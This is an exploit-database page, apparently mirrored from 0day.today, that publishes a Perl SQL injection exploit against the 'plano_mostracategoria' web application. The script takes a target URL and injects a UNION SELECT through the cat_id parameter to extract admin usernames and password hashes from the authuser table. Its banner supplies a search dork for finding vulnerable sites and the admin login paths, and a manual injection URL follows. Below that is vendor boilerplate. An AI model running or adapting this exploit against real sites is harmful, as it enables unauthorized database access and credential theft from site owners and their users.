Lucene search
K

plano mostracategoria (id) Remote SQL Injection Vulnerability

🗓️ 15 Sep 2010 00:00:00Reported by kalashnikovType 
zdt
 zdt
🔗 0day.today👁 29 Views

plano mostracategoria Remote SQL Injection Vul

Code
=============================================================
plano mostracategoria (id) Remote SQL Injection Vulnerability
=============================================================

# Author: [kalashnikov]
# Software Link: [download link if available] / 404
# Tested on: [bk4 r1]
#!/usr/bin/perl -w
# plano mostracategoria (id) Remote SQL Injection Vulnerability
# Author    : kalashnikov
# Site      : http://kalashnikov-team.com + http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {13-9-2010}
# Software  : plano_mostracategoria
# Greetz    : Madjix,ViRuS_HaCkErS,his0k4,el$b7 elmr7,sec4ever,red virus,hassan81,claw,RiSkY,data$hack,Cr3W-Dz,Antivirus7,El3ctr0-dz
# team      : VoLc4n0 --=-- stone love --=-- fla$h
print "|----------------------------------------------------|\n";
print "|     plano mostracategoria Remote SQL Injector      |\n";
print "|                                                    |\n";
print "| Coded by : kalashnikov                             |\n";
print "| Dork     : inurl:plano_mostracategoria             |\n";
print "|                                                    |\n";
print "| admin cp : /login.php or /vadmin                   |\n";
print "|                                                    |\n";
print "|                  kalashnikov team                  |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nMasukin Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
#Nama Column
$concatenation="concat(uname,char(58),passwd)volc4n0";
#Nama Table
$table="authuser";
$injection="-7+union+select+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "plano_index.php?paginas=plano_mostracategoria&cat_id=".$injection."+".$concatenation.",1,2,3,4,5,6,7+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !! Check target for details...\n";
print "\n";
print "Attention:\n";
print "VoLc4n0 Palestine hacker -- Jenin \n";
print " !!\n";
print "\n";
}
else{print "\n[-] wah gagal bro (Belom Cebok tangan lo)...\n";
print "\n";
print "\n";
print "localhost/plano_index.php?paginas=plano_mostracategoria&[email protected]@version,2,3,4,5,6,7,8--\n";
}



#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Sep 2010 00:00Current
7.1High risk
Vulners AI Score7.1
29